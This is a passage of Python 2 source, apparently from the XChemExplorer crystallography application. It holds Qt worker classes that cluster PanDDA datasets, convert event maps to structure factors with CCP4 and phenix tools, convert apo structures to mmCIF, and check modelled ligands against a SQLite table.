os.chdir(self.initial_model_directory)
for xtal in glob.glob('*'):
if not os.path.isfile(os.path.join(xtal,self.pdb_style)):
self.Logfile.insert('{2!s}: missing or broken {0!s}; removing {0!s} and {1!s} links'.format(self.pdb_style, self.mtz_style, xtal))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.pdb_style))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.mtz_style))
self.emit(QtCore.SIGNAL('update_progress_bar'), 20)
# 3.) giant.cluster_mtzs_and_pdbs
self.Logfile.insert("running giant.cluster_mtzs_and_pdbs {0!s}/*/{1!s} pdb_regex='{2!s}/(.*)/{3!s}' out_dir='{4!s}/cluster_analysis'".format(self.initial_model_directory, self.pdb_style, self.initial_model_directory, self.pdb_style, self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'running giant.cluster_mtzs_and_pdbs')
if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh')
elif os.getenv('SHELL') == '/bin/bash':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')
else:
source_file=''
Cmds = (
'#!'+os.getenv('SHELL')+'\n'
'unset PYTHONPATH\n'
'source '+source_file+'\n'
"giant.datasets.cluster %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory)
)
# os.system("giant.cluster_mtzs_and_pdbs %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory))
os.system(Cmds)
self.emit(QtCore.SIGNAL('update_progress_bar'), 80)
# 4.) analyse output
self.Logfile.insert('parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
os.chdir('{0!s}/cluster_analysis'.format(self.panddas_directory))
cluster_dict={}
for out_dir in sorted(glob.glob('*')):
if os.path.isdir(out_dir):
cluster_dict[out_dir]=[]
for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
xtal=folder[folder.rfind('/')+1:]
cluster_dict[out_dir].append(xtal)
self.emit(QtCore.SIGNAL('update_progress_bar'), 90)
# 5.) update datasource
self.Logfile.insert('updating datasource with results from giant.datasets.cluster')
if cluster_dict != {}:
for key in cluster_dict:
for xtal in cluster_dict[key]:
db_dict= {'CrystalFormName': key}
self.db.update_data_source(xtal,db_dict)
# 6.) finish
self.emit(QtCore.SIGNAL('update_progress_bar'), 100)
self.Logfile.insert('finished giant.datasets.cluster')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class check_if_pandda_can_run:
# reasons why pandda cannot be run
# - there is currently a job running in the pandda directory
# - min datasets available is too low
# - required input parameters are not complete
# - map amplitude and phase labels don't exist
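# error codes set by the analyse_* methods below and translated by warning_messages():
# 1 = no file matching pdb_style, 2 = no file matching mtz_style,
# 3 = number of datasets is not larger than min_build_datasets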
def __init__(self,pandda_params,xce_logfile,datasource):
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.input_dir_structure=pandda_params['pandda_dir_structure']
self.problem_found=False
self.error_code=-1
self.Logfile=XChemLog.updateLog(xce_logfile)
self.db=XChemDB.data_source(datasource)
def number_of_available_datasets(self):
counter=0
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
counter+=1
self.Logfile.insert('pandda.analyse: found {0!s} useable datasets'.format(counter))
return counter
def get_first_dataset_in_project_directory(self):
first_dataset=''
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
first_dataset=file
break
return first_dataset
def compare_number_of_atoms_in_reference_vs_all_datasets(self,refData,dataset_list):
mismatched_datasets=[]
pdbtools=XChemUtils.pdbtools(refData)
refPDB=refData[refData.rfind('/')+1:]
refPDBlist=pdbtools.get_init_pdb_as_list()
n_atom_ref=len(refPDBlist)
for n_datasets,dataset in enumerate(dataset_list):
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
n_atom=len(pdbtools.get_pdb_as_list(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)))
if n_atom_ref == n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> OK'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
if n_atom_ref != n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> ERROR'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
mismatched_datasets.append(dataset)
return n_datasets,mismatched_datasets
def get_datasets_which_fit_to_reference_file(self,ref,reference_directory,cluster_dict,allowed_unitcell_difference_percent):
refStructure=XChemUtils.pdbtools(os.path.join(reference_directory,ref+'.pdb'))
symmRef=refStructure.get_spg_number_from_pdb()
ucVolRef=refStructure.calc_unitcell_volume_from_pdb()
cluster_dict[ref]=[]
cluster_dict[ref].append(os.path.join(reference_directory,ref+'.pdb'))
for dataset in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
datasetStructure=XChemUtils.pdbtools(dataset)
symmDataset=datasetStructure.get_spg_number_from_pdb()
ucVolDataset=datasetStructure.calc_unitcell_volume_from_pdb()
if symmDataset == symmRef:
try:
difference=math.fabs(1-(float(ucVolRef)/float(ucVolDataset)))*100
if difference < allowed_unitcell_difference_percent:
sampleID=dataset.replace('/'+self.pdb_style,'')[dataset.replace('/'+self.pdb_style,'').rfind('/')+1:]
cluster_dict[ref].append(sampleID)
except ZeroDivisionError:
continue
return cluster_dict
def remove_dimple_files(self,dataset_list):
for n_datasets,dataset in enumerate(dataset_list):
db_dict={}
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.pdb_style))
db_dict['DimplePathToPDB']=''
db_dict['DimpleRcryst']=''
db_dict['DimpleRfree']=''
db_dict['DimpleResolutionHigh']=''
db_dict['DimpleStatus']='pending'
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.mtz_style))
db_dict['DimplePathToMTZ']=''
if db_dict != {}:
self.db.update_data_source(dataset,db_dict)
def analyse_pdb_style(self):
pdb_found=False
for file in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
if os.path.isfile(file):
pdb_found=True
break
if not pdb_found:
self.error_code=1
message=self.warning_messages()
return message
def analyse_mtz_style(self):
mtz_found=False
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
mtz_found=True
break
if not mtz_found:
self.error_code=2
message=self.warning_messages()
return message
def analyse_min_build_dataset(self):
counter=0
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
counter+=1
if counter <= self.min_build_datasets:
self.error_code=3
message=self.warning_messages()
return message
def warning_messages(self):
message=''
if self.error_code==1:
message='PDB file does not exist'
if self.error_code==2:
message='MTZ file does not exist'
if self.error_code==3:
message='Not enough datasets available'
return message
class convert_all_event_maps_in_database(QtCore.QThread):
def __init__(self,initial_model_directory,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
def run(self):
sqlite = (
'select'
' CrystalName,'
' PANDDA_site_event_map,'
' PANDDA_site_ligand_resname,'
' PANDDA_site_ligand_chain,'
' PANDDA_site_ligand_sequence_number,'
' PANDDA_site_ligand_altLoc '
'from panddaTable '
'where PANDDA_site_event_map not like "event%"'
)
print sqlite
query=self.db.execute_statement(sqlite)
print query
progress_step=1
if len(query) != 0:
progress_step=100/float(len(query))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for item in query:
print item
xtalID=str(item[0])
event_map=str(item[1])
resname=str(item[2])
chainID=str(item[3])
resseq=str(item[4])
altLoc=str(item[5])
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')):
os.chdir(os.path.join(self.initial_model_directory,xtalID))
self.Logfile.insert('extracting ligand ({0!s},{1!s},{2!s},{3!s}) from refine.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc)))
XChemUtils.pdbtools(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')).save_specific_ligands_to_pdb(resname,chainID,resseq,altLoc)
if os.path.isfile('ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))):
ligand_pdb='ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))
print os.path.join(self.initial_model_directory,xtalID,ligand_pdb)
else:
self.Logfile.insert('could not extract ligand; trying next...')
continue
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.pdb; trying next')
continue
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')):
resolution=XChemUtils.mtztools(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')).get_high_resolution_from_mtz()
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.mtz; trying next')
continue
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'eventMap -> SF for '+event_map)
convert_event_map_to_SF(self.initial_model_directory,xtalID,event_map,ligand_pdb,self.xce_logfile,self.datasource,resolution).run()
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class convert_event_map_to_SF:
def __init__(self,project_directory,xtalID,event_map,ligand_pdb,xce_logfile,db_file,resolution):
self.Logfile=XChemLog.updateLog(xce_logfile)
self.event_map=event_map
if not os.path.isfile(self.event_map):
self.Logfile.insert('cannot find Event map: '+self.event_map)
self.Logfile.insert('cannot convert event_map to structure factors!')
return None
self.project_directory=project_directory
self.xtalID=xtalID
self.event_map=event_map
self.ligand_pdb=ligand_pdb
self.event=event_map[event_map.rfind('/')+1:].replace('.map','').replace('.ccp4','')
self.db=XChemDB.data_source(db_file)
self.resolution=resolution
def run(self):
os.chdir(os.path.join(self.project_directory,self.xtalID))
# remove existing mtz file
if os.path.isfile(self.event+'.mtz'):
self.Logfile.insert('removing existing '+self.event+'.mtz')
os.system('/bin/rm '+self.event+'.mtz')
# event maps generated with pandda v0.2 or higher have the same symmetry as the crystal,
# but phenix.map_to_structure_factors only accepts maps in spacegroup P1;
# therefore the map is first expanded to the full unit cell and its spacegroup set to P1.
# other conversion options like cinvfft give, for whatever reason, uninterpretable maps
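# overall pipeline as implemented below: ccp4 event map -> mapmask expansion to P1 ->
# phenix.map_to_structure_factors -> cad to rename the output columns to F_ampl/PHIF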
self.convert_map_to_p1()
# run phenix.map_to_structure_factors
self.run_phenix_map_to_structure_factors()
self.remove_and_rename_column_labels()
# check if output files exist
if not os.path.isfile('{0!s}.mtz'.format(self.event)):
self.Logfile.insert('cannot find {0!s}.mtz'.format(self.event))
else:
self.Logfile.insert('conversion successful, {0!s}.mtz exists'.format(self.event))
# update datasource with event_map_mtz information
self.update_database()
def calculate_electron_density_map(self,mtzin):
missing_columns=False
column_dict=XChemUtils.mtztools(mtzin).get_all_columns_as_dict()
if 'FWT' in column_dict['F'] and 'PHWT' in column_dict['PHS']:
labin=' labin F1=FWT PHI=PHWT\n'
elif '2FOFCWT' in column_dict['F'] and 'PH2FOFCWT' in column_dict['PHS']:
labin=' labin F1=2FOFCWT PHI=PH2FOFCWT\n'
else:
missing_columns=True
if not missing_columns:
os.chdir(os.path.join(self.project_directory,self.xtalID))
cmd = (
'fft hklin '+mtzin+' mapout 2fofc.map << EOF\n'
+labin+
'EOF\n'
)
self.Logfile.insert('calculating 2fofc map from '+mtzin)
os.system(cmd)
else:
self.Logfile.insert('cannot calculate 2fofc.map; missing map coefficients')
def prepare_conversion_script(self):
os.chdir(os.path.join(self.project_directory, self.xtalID))
# see also:
# http://www.phaser.cimr.cam.ac.uk/index.php/Using_Electron_Density_as_a_Model
if os.getcwd().startswith('/dls'):
phenix_module='module_load_phenix\n'
else:
phenix_module=''
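# note: this method is not called from run() above; it also relies on self.space_group,
# self.unit_cell, self.gridElectronDensityMap and self.space_group_numberElectronDensityMap,
# none of which are set in __init__, so any caller is assumed to attach them to the instance first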
cmd = (
'#!'+os.getenv('SHELL')+'\n'
'\n'
+phenix_module+
'\n'
'pdbset XYZIN %s XYZOUT mask_ligand.pdb << eof\n' %self.ligand_pdb+
' SPACEGROUP {0!s}\n'.format(self.space_group)+
' CELL {0!s}\n'.format((' '.join(self.unit_cell)))+
' END\n'
'eof\n'
'\n'
'ncsmask XYZIN mask_ligand.pdb MSKOUT mask_ligand.msk << eof\n'
' GRID %s\n' %(' '.join(self.gridElectronDensityMap))+
' RADIUS 10\n'
' PEAK 1\n'
'eof\n'
'\n'
'mapmask MAPIN %s MAPOUT onecell_event_map.map << eof\n' %self.event_map+
' XYZLIM CELL\n'
'eof\n'
'\n'
'maprot MAPIN onecell_event_map.map MSKIN mask_ligand.msk WRKOUT masked_event_map.map << eof\n'
' MODE FROM\n'
' SYMMETRY WORK %s\n' %self.space_group_numberElectronDensityMap+
' AVERAGE\n'
' ROTATE EULER 0 0 0\n'
' TRANSLATE 0 0 0\n'
'eof\n'
'\n'
'mapmask MAPIN masked_event_map.map MAPOUT masked_event_map_fullcell.map << eof\n'
' XYZLIM CELL\n'
' PAD 0.0\n'
'eof\n'
'\n'
'sfall HKLOUT %s.mtz MAPIN masked_event_map_fullcell.map << eof\n' %self.event+
' LABOUT FC=FC_event PHIC=PHIC_event\n'
' MODE SFCALC MAPIN\n'
' RESOLUTION %s\n' %self.resolution+
' END\n'
'eof\n'
)
self.Logfile.insert('preparing script for conversion of Event map to SF')
f = open('eventMap2sf.sh','w')
f.write(cmd)
f.close()
os.system('chmod +x eventMap2sf.sh')
def run_conversion_script(self):
self.Logfile.insert('running conversion script...')
os.system('./eventMap2sf.sh')
def convert_map_to_p1(self):
self.Logfile.insert('running mapmask -> converting map to p1...')
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'mapmask mapin %s mapout %s_p1.map << eof\n' %(self.event_map,self.event) +
'xyzlim cell\n'
'symmetry p1\n'
'eof\n' )
self.Logfile.insert('mapmask command:\n%s' %cmd)
os.system(cmd)
def run_phenix_map_to_structure_factors(self):
if float(self.resolution) < 1.21: # phenix.map_to_structure_factors complains if d_min is 1.2 A or better
self.resolution='1.21'
self.Logfile.insert('running phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
os.system('phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
def run_cinvfft(self,mtzin):
# mtzin is usually refine.mtz
self.Logfile.insert('running cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
os.system('cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
def remove_and_rename_column_labels(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=F-obs E2=PHIF\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: new column labels F_ampl,PHIF')
os.system(cmd)
def remove_and_rename_column_labels_after_cinvfft(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=event.F_phi.F E2=event.F_phi.phi\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: renaming event.F_phi.F -> F_ampl and event.F_phi.phi -> PHIF')
os.system(cmd)
def update_database(self):
sqlite = ( "update panddaTable set "
" PANDDA_site_event_map_mtz = '%s' " %os.path.join(self.project_directory,self.xtalID,self.event+'.mtz')+
" where PANDDA_site_event_map is '{0!s}' ".format(self.event_map)
)
self.db.execute_statement(sqlite)
self.Logfile.insert('updating data source: '+sqlite)
def clean_output_directory(self):
os.system('/bin/rm mask_ligand.pdb')
os.system('/bin/rm mask_ligand.msk')
os.system('/bin/rm onecell_event_map.map')
os.system('/bin/rm masked_event_map.map')
os.system('/bin/rm masked_event_map_fullcell.map')
os.system('/bin/rm eventMap2sf.sh')
os.system('/bin/rm '+self.ligand_pdb)
class run_pandda_inspect_at_home(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def run(self):
os.chdir(os.path.join(self.panddaDir,'processed_datasets'))
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('parsing '+self.panddaDir)
for xtal in sorted(glob.glob('*')):
for files in glob.glob(xtal+'/ligand_files/*'):
if os.path.islink(files):
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'replacing symlink for {0!s} with real file'.format(files))
self.Logfile.insert('replacing symlink for {0!s} with real file'.format(files))
os.system('cp --remove-destination {0!s} {1!s}/ligand_files'.format(os.path.realpath(files), xtal))
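# replacing the links with real files is presumably done so that the pandda directory can be
# copied to another machine/file system where the symlink targets would no longer resolve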
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
XChemToolTips.run_pandda_inspect_at_home(self.panddaDir)
class convert_apo_structures_to_mmcif(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def sf_convert_environment(self):
pdb_extract_init = ''
if os.path.isdir('/dls'):
pdb_extract_init = 'source /dls/science/groups/i04-1/software/pdb-extract-prod/setup.sh\n'
pdb_extract_init += '/dls/science/groups/i04-1/software/pdb-extract-prod/bin/sf_convert'
else:
pdb_extract_init = 'source ' + os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/setup.sh') + '\n'
pdb_extract_init += os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/bin/sf_convert')
return pdb_extract_init
def run(self):
self.Logfile.insert('converting apo structures in pandda directory to mmcif files')
self.Logfile.insert('changing to '+self.panddaDir)
progress_step=1
if len(glob.glob(os.path.join(self.panddas_directory if False else self.panddaDir,'processed_datasets','*'))) != 0:
progress_step=100/float(len(glob.glob(os.path.join(self.panddaDir,'processed_datasets','*'))))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
pdb_extract_init = self.sf_convert_environment()
self.Logfile.insert('parsing '+self.panddaDir)
for dirs in glob.glob(os.path.join(self.panddaDir,'processed_datasets','*')):
xtal = dirs[dirs.rfind('/')+1:]
self.Logfile.insert('%s: converting %s to mmcif' %(xtal,xtal+'-pandda-input.mtz'))
if os.path.isfile(os.path.join(dirs,xtal+'-pandda-input.mtz')):
if os.path.isfile(os.path.join(dirs,xtal+'_sf.mmcif')):
self.Logfile.insert('%s: %s_sf.mmcif exists; skipping...' %(xtal,xtal))
else:
os.chdir(dirs)
Cmd = (pdb_extract_init +
' -o mmcif'
' -sf %s' % xtal+'-pandda-input.mtz' +
' -out {0!s}_sf.mmcif > {1!s}.sf_mmcif.log'.format(xtal, xtal))
self.Logfile.insert('running command: '+Cmd)
os.system(Cmd)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class check_number_of_modelled_ligands(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,db_file):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.db=XChemDB.data_source(db_file)
self.errorDict={}
def update_errorDict(self,xtal,message):
if xtal not in self.errorDict:
self.errorDict[xtal]=[]
self.errorDict[xtal].append(message)
def insert_new_row_in_panddaTable(self,xtal,ligand,site,dbDict):
resname= site[0]
chain= site[1]
seqnum= site[2]
altLoc= site[3]
x_site= site[5][0]
y_site= site[5][1]
z_site= site[5][2]
resnameSimilarSite= ligand[0]
chainSimilarSite= ligand[1]
seqnumSimilarSite= ligand[2]
siteList=[]
for entry in dbDict[xtal]:
siteList.append(str(entry[0]))
if entry[4] == resnameSimilarSite and entry[5] == chainSimilarSite and entry[6] == seqnumSimilarSite:
eventMap= str(entry[7])
eventMap_mtz= str(entry[8])
initialPDB= str(entry[9])
initialMTZ= str(entry[10])
event_id= str(entry[12])
PanDDApath= str(entry[13])
db_dict={
'PANDDA_site_index': str(int(max(siteList))+1),
'PANDDApath': PanDDApath,
'PANDDA_site_ligand_id': resname+'-'+chain+'-'+seqnum,
'PANDDA_site_ligand_resname': resname,
'PANDDA_site_ligand_chain': chain,
'PANDDA_site_ligand_sequence_number': seqnum,
'PANDDA_site_ligand_altLoc': 'D',
'PANDDA_site_event_index': event_id,
'PANDDA_site_event_map': eventMap,
'PANDDA_site_event_map_mtz': eventMap_mtz,
'PANDDA_site_initial_model': initialPDB,
'PANDDA_site_initial_mtz': initialMTZ,
'PANDDA_site_ligand_placed': 'True',
'PANDDA_site_x': x_site,
'PANDDA_site_y': y_site,
'PANDDA_site_z': z_site }
print xtal,db_dict
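# note: db_dict above is currently only assembled and printed for inspection;
# it is never written back to the panddaTable in this method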
def run(self):
self.Logfile.insert('reading modelled ligands from panddaTable')
dbDict={}
sqlite = ( "select "
" CrystalName,"
" PANDDA_site_index,"
" PANDDA_site_x,"
" PANDDA_site_y,"
" PANDDA_site_z,"
" PANDDA_site_ligand_resname,"
" PANDDA_site_ligand_chain,"
" PANDDA_site_ligand_sequence_number,"
" PANDDA_site_event_map,"
" PANDDA_site_event_map_mtz,"
" PANDDA_site_initial_model,"
" PANDDA_site_initial_mtz,"
" RefinementOutcome,"
" PANDDA_site_event_index,"
" PANDDApath "
"from panddaTable " )
dbEntries=self.db.execute_statement(sqlite)
for item in dbEntries:
xtal= str(item[0])
site= str(item[1])
x= str(item[2])
y= str(item[3])
z= str(item[4])
resname= str(item[5])
chain= str(item[6])
seqnum= str(item[7])
eventMap= str(item[8])
eventMap_mtz= str(item[9])
initialPDB= str(item[10])
initialMTZ= str(item[11])
outcome= str(item[12])
event= str(item[13])
PanDDApath= str(item[14])
if xtal not in dbDict:
dbDict[xtal]=[]
dbDict[xtal].append([site,x,y,z,resname,chain,seqnum,eventMap,eventMap_mtz,initialPDB,initialMTZ,outcome,event,PanDDApath])
os.chdir(self.project_directory)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for xtal in sorted(glob.glob('*')):
if os.path.isfile(os.path.join(xtal,'refine.pdb')):
ligands=XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).ligand_details_as_list()
self.Logfile.insert('{0!s}: found file refine.pdb'.format(xtal))
if ligands:
if os.path.isdir(os.path.join(xtal,'xceTmp')):
os.system('/bin/rm -fr {0!s}'.format(os.path.join(xtal,'xceTmp')))
os.mkdir(os.path.join(xtal,'xceTmp'))
else:
self.Logfile.warning('{0!s}: cannot find ligand molecule in refine.pdb; skipping...'.format(xtal))
continue
made_sym_copies=False
ligands_not_in_panddaTable=[]
for n,item in enumerate(ligands):
resnameLIG= item[0]
chainLIG= item[1]
seqnumLIG= item[2]
altLocLIG= item[3]
occupancyLig= item[4]
if altLocLIG.replace(' ','') == '':
self.Logfile.insert(xtal+': found a ligand not modelled with pandda.inspect -> {0!s} {1!s} {2!s}'.format(resnameLIG, chainLIG, seqnumLIG))
residue_xyz = XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).get_center_of_gravity_of_residue_ish(item[1],item[2])
ligands[n].append(residue_xyz)
foundLigand=False
if xtal in dbDict:
for entry in dbDict[xtal]:
resnameTable=entry[4]
chainTable=entry[5]
seqnumTable=entry[6]
self.Logfile.insert('panddaTable: {0!s} {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
if resnameLIG == resnameTable and chainLIG == chainTable and seqnumLIG == seqnumTable:
self.Logfile.insert('{0!s}: found ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
foundLigand=True
if not foundLigand:
self.Logfile.error('{0!s}: did NOT find ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameLIG, chainLIG, seqnumLIG))
ligands_not_in_panddaTable.append([resnameLIG,chainLIG,seqnumLIG,altLocLIG,occupancyLig,residue_xyz])
else:
self.Logfile.warning('ligand in PDB file, but dataset not listed in panddaTable: {0!s} -> {1!s} {2!s} {3!s}'.format(xtal, item[0], item[1], item[2]))
for entry in ligands_not_in_panddaTable:
self.Logfile.error('{0!s}: refine.pdb contains a ligand that is not assigned in the panddaTable: {1!s} {2!s} {3!s} {4!s}'.format(xtal, entry[0], entry[1], entry[2], entry[3]))
for site in ligands_not_in_panddaTable:
for files in glob.glob(os.path.join(self.project_directory,xtal,'xceTmp','ligand_*_*.pdb')):
mol_xyz = XChemUtils.pdbtools(files).get_center_of_gravity_of_molecule_ish()
# now need to check if there is a unassigned entry in panddaTable that is close
for entry in dbDict[xtal]:
distance = XChemUtils.misc().calculate_distance_between_coordinates(mol_xyz[0], mol_xyz[1],mol_xyz[2],entry[1],entry[2], entry[3])
self.Logfile.insert('{0!s}: {1!s} {2!s} {3!s} <---> {4!s} {5!s} {6!s}'.format(xtal, mol_xyz[0], mol_xyz[1], mol_xyz[2], entry[1], entry[2], entry[3]))
self.Logfile.insert('{0!s}: symm equivalent molecule: {1!s}'.format(xtal, files))
self.Logfile.insert('{0!s}: distance: {1!s}'.format(xtal, str(distance)))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
if self.errorDict != {}:
self.update_errorDict('General','The aforementioned PDB files were automatically changed by XCE!\nPlease check and refine them!!!')
self.emit(QtCore.SIGNAL('show_error_dict'), self.errorDict)
class find_event_map_for_ligand(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,external_software):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.external_software=external_software
try:
import gemmi
self.Logfile.insert('found gemmi library in ccp4-python')
except ImportError:
self.external_software['gemmi'] = False
self.Logfile.warning('cannot import gemmi; will use phenix.map_to_structure_factors instead')
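# caveat: 'import gemmi' above only binds the name inside __init__; run() below therefore
# imports it again when it actually needs the module, or falls back to phenix otherwise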
def run(self):
self.Logfile.insert('======== checking ligand CC in event maps ========')
for dirs in sorted(glob.glob(os.path.join(self.project_directory,'*'))):
xtal = dirs[dirs.rfind('/')+1:]
if os.path.isfile(os.path.join(dirs,'refine.pdb')) and \
os.path.isfile(os.path.join(dirs,'refine.mtz')):
self.Logfile.insert('%s: found refine.pdb' %xtal)
os.chdir(dirs)
try:
import gemmi # the import in __init__ is local to that method, so bind the module here as well
p = gemmi.read_structure('refine.pdb')
except:
self.Logfile.error('gemmi library not available')
self.external_software['gemmi'] = False
reso = XChemUtils.mtztools('refine.mtz').get_dmin()
ligList = XChemUtils.pdbtools('refine.pdb').save_residues_with_resname(dirs,'LIG')
self.Logfile.insert('%s: found %s ligands of type LIG in refine.pdb' %(xtal,str(len(ligList))))
for maps in glob.glob(os.path.join(dirs,'*event*.native.ccp4')):
if self.external_software['gemmi']:
self.convert_map_to_sf_with_gemmi(maps,p)
else:
self.expand_map_to_p1(maps)
self.convert_map_to_sf(maps.replace('.ccp4','.P1.ccp4'),reso)
summary = ''
for lig in sorted(ligList):
if self.external_software['gemmi']:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
else:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native*P1.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
self.Logfile.insert('\nsummary of CC analysis:\n======================:\n'+summary)
def expand_map_to_p1(self,emap):
self.Logfile.insert('expanding map to P1: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.P1.ccp4')):
self.Logfile.warning('P1 map exists; skipping...')
return
cmd = ( 'mapmask MAPIN %s MAPOUT %s << eof\n' %(emap,emap.replace('.ccp4','.P1.ccp4'))+
' XYZLIM CELL\n'
' PAD 0.0\n'
' SYMMETRY 1\n'
'eof\n' )
os.system(cmd)
